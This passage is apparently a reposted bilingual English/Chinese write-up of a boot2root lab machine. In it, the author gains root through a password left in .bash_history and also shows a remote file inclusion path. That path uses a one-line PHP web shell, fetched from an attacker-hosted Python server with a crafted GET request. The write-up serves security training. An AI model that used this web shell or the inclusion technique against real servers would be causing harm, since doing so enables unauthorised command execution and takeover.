1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:17:c9 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.1.4/24 brd 192.168.1.255 scope global noprefixroute ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe36:17c9/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation – Root
权限提升 – 根
Privilege Escalation was not difficult, it was very easy.
权限提升并不难,非常容易。
I didn’t even need an enumeration looking for SUID binaries or anything like that.
我什至不需要枚举来寻找SUID二进制文件或类似的东西。
As mentioned above, we know that there is an offsec user.
如上所述,我们知道有一个 offsec 用户。
Looking at “.bash_history”, which is the command history of user offsec, the offsec user uses “sshpass” to connect to root by passing the password as a command argument, and executes “sshpass -p starship ssh root@localhost”. confirmed.
查看用户offsec的命令历史“.bash_history”,offsec用户使用“sshpass”通过传递密码作为命令参数连接到root,并执行“sshpass -p starship ssh root@localhost”。证实。
www-data@offsec-4-diveintoive:/var/www/html$ cd /home/offsec
cd /home/offsec
www-data@offsec-4-diveintoive:/home/offsec$ ls -al
ls -al
total 80
drwxr-xr-x 14 offsec offsec 4096 10月 27 01:54 .
drwxr-xr-x 3 root root 4096 10月 27 00:57 ..
-rwxr-xr-x 1 offsec offsec 145 10月 27 01:54 .bash_history
-rw-r--r-- 1 offsec offsec 220 10月 27 00:57 .bash_logout
-rw-r--r-- 1 offsec offsec 3771 10月 27 00:57 .bashrc
drwx------ 9 offsec offsec 4096 10月 27 01:48 .cache
drwx------ 11 offsec offsec 4096 10月 27 01:48 .config
drwx------ 3 offsec offsec 4096 10月 27 01:06 .local
-rw-r--r-- 1 offsec offsec 807 10月 27 00:57 .profile
-rw-r--r-- 1 offsec offsec 0 10月 27 01:08 .sudo_as_admin_successful
-rw------- 1 offsec offsec 5431 10月 27 01:54 .viminfo
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Desktop
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Documents
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Downloads
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Music
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Pictures
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Public
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Templates
drwxr-xr-x 2 offsec offsec 4096 10月 27 01:06 Videos
drwx------ 3 offsec offsec 4096 10月 27 01:07 snap
www-data@offsec-4-diveintoive:/home/offsec$ cat .bash_history
cat .bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p starship ssh root@localhost
apt-get install sshpass
ps -ef
top
kill -9 3747
exit
sudo su -
su -
cd ~
pwdThere is a very high probability that root users use “starship” as their password.
root用户很有可能使用“starship”作为他们的密码。
I first tried sshing into root to see if I could log in with the password “starship”, but this failed.
我首先尝试通过sshing进入root,看看是否可以使用密码“starship”登录,但这失败了。
$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.However, solving this problem was easy. I was able to switch to the root user by using the “su root” command with the password “starship” as the www-data user.
但是,解决这个问题很容易。我能够通过使用密码为“starship”的“su root”命令作为 www-data 用户切换到 root 用户。
www-data@offsec-4-diveintoive:/home/offsec$ su root
su root
Password: starship
root@offsec-4-diveintoive:/home/offsec# whoami
whoami
root
root@offsec-4-diveintoive:/home/offsec# id
id
uid=0(root) gid=0(root) groups=0(root)
root@offsec-4-diveintoive:/home/offsec# cat /root/flag.txt
cat /root/flag.txt
flag{<REDACTED>}Another Solution – Remote file inclusion (RFI)
另一种解决方案 – 远程文件包含 (RFI)
The steps up to leaking the include.php source code are similar.
泄露包含.php源代码的步骤是类似的。
As mentioned above, include.php is a process that adds .php to the value passed to the page parameter and displays it.
如上所述,include.php 是一个将 .php 添加到传递给页面参数的值并显示它的过程。
So, if we create shell.php locally with python simple server and call http://192.168.1.100:8000/shell.php will be added and executed as PHP.
因此,如果我们使用 python 在本地创建 shell.php简单的服务器并调用 http://192.168.1.100:8000/shell.php 将被添加并作为 PHP 执行。
$ cat shell.php
<?php system($_REQUEST["cmd"]);?>Send a request by specifying your local shell.php in the page parameter.
通过在页面参数中指定本地 shell.php 来发送请求。
GET /include.php?page=http://192.168.1.100:8000/shell&Submit=Submit&cmd=whoami HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.4/
Connection: close
Upgrade-Insecure-Requests: 1
A request to shell.php comes from the server.
对 shell.php 的请求来自服务器。
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.4 - - [29/Oct/2023 09:17:42] "GET /shell.php HTTP/1.1" 200 -As a result, shell.php is expanded and the command can be executed by passing an arbitrary command to the cmd argument.
因此,shell.php 被扩展,可以通过将任意命令传递给 cmd 参数来执行命令。
When I asked the creator of the problem, this method seemed to be closer to the expected solution.
当我询问问题的创建者时,这种方法似乎更接近预期的解决方案。
After this, we only need to set up a reverse shell following the same procedure as the solution mentioned above and privilege escalation.
在此之后,我们只需要按照与上述解决方案相同的程序设置反向 shell,并进行权限提升。
Thoughts 思潮
My solution this time was to generate arbitrary PHP code for inclusion without writing to a file, and rce it with a php filter chain, but I think RFI attacks must also be taken into account. In fact, RFI seems to be closer to the correct answer.
我这次的解决方案是在不写入文件的情况下生成任意的PHP代码,并使用php过滤器链对其进行r&r&;事实上,RFI似乎更接近正确答案。
User was an interesting challenge. However, Privilege Escalation to root may actually work in real life, but it was too simple.
用户是一个有趣的挑战。然而,权限提升到root在现实生活中可能确实有效,但它太简单了。
Reference 参考
SecLists/Fuzzing/LFI /LFI-Jhaddix.txt
PayloadsAllTheThings/File Inclusion /README.md
Local File Inclusion (LFI) — Web Application Penetration Testing
本地文件包含 (LFI) — Web 应用程序渗透测试
本地文件包含 (LFI) — Web 应用程序渗透测试
The definitive guide for LFI vulnerability security testing for bug hunting & penetration testing engagements.
LFI 漏洞安全测试的权威指南,用于漏洞搜寻和渗透测试活动。
LFI 漏洞安全测试的权威指南,用于漏洞搜寻和渗透测试活动。
PHP filters chain: What is it and how to use it
PHP过滤器链:它是什么以及如何使用它
PHP过滤器链:它是什么以及如何使用它
Searching for new gadget chains to exploit deserialization vulnerabilities can be tedious.
寻找新的小工具链来利用反序列化漏洞可能很乏味。
寻找新的小工具链来利用反序列化漏洞可能很乏味。
LFI2RCE via PHP Filters – HackTricks
通过PHP过滤器LFI2RCE – HackTricks
通过PHP过滤器LFI2RCE – HackTricks
$convs = array(’437′, ‘500’, ‘500V1’, ‘850’, ‘851’, ‘852’, ‘855’, ‘856’, ‘857’, ‘858’, ‘860’, ‘861’, ‘862’, ‘863’, ‘864’, ‘865’, ‘866’, ‘866NAV’, ‘869’, ‘874’, ‘904’, ‘1026’, ‘1046’, ‘1047’, ‘8859_1’, ‘8859_2’, ‘8859_3’, ‘8859_4’, ‘8859_5’, ‘8859_6’, ‘8859_7’, ‘8859_8’, ‘8859_9’, ‘10646-1:1993’, ’10…
$convs = array(’437’, ‘500’, ‘500V1’, ‘850’, ‘851’, ‘852’, ‘855’, ‘856’, ‘857’, ‘858’, ‘860’, ‘861’, ‘862’, ‘863’, ‘864’, ‘865’, ‘866’, ‘866NAV’, ‘869’, ‘874’, ‘904’, ‘1026’, ‘1046’, ‘1047’, ‘8859_1’, ‘8859_2’, ‘8859_3’, ‘8859_4’, ‘8859_5’, ‘8859_6’, ‘8859_7’, ‘8859_8’, ‘8859_9’, ‘10646-1:1993’, ’10…
$convs = array(’437’, ‘500’, ‘500V1’, ‘850’, ‘851’, ‘852’, ‘855’, ‘856’, ‘857’, ‘858’, ‘860’, ‘861’, ‘862’, ‘863’, ‘864’, ‘865’, ‘866’, ‘866NAV’, ‘869’, ‘874’, ‘904’, ‘1026’, ‘1046’, ‘1047’, ‘8859_1’, ‘8859_2’, ‘8859_3’, ‘8859_4’, ‘8859_5’, ‘8859_6’, ‘8859_7’, ‘8859_8’, ‘8859_9’, ‘10646-1:1993’, ’10…
Solving “includer’s revenge” from hxp ctf 2021 without controlling any files
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge”
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge”
Solving “includer’s revenge” from hxp ctf 2021 without controlling any files – writeup.md
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge” – writeup.md
在不控制任何文件的情况下解决 hxp ctf 2021 中的“includer’s revenge” – writeup.md
GitHub – synacktiv/php_filter_chain_generator
Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub.
通过在 GitHub 上创建帐户,为 synacktiv/php_filter_chain_generator 开发做出贡献。
通过在 GitHub 上创建帐户,为 synacktiv/php_filter_chain_generator 开发做出贡献。
原文始发于Yunolay’s Blog:Offensive Security Lab Japan Boot2Root offsec-4-diveintoive Writeup by Yunolay (LFI2RCE via PHP Filters, RFI)
版权声明:admin 发表于 2023年10月31日 上午8:55。
转载请注明:Offensive Security Lab Japan Boot2Root offsec-4-diveintoive Writeup by Yunolay (LFI2RCE via PHP Filters, RFI) | CTF导航
转载请注明:Offensive Security Lab Japan Boot2Root offsec-4-diveintoive Writeup by Yunolay (LFI2RCE via PHP Filters, RFI) | CTF导航
相关文章
暂无评论...
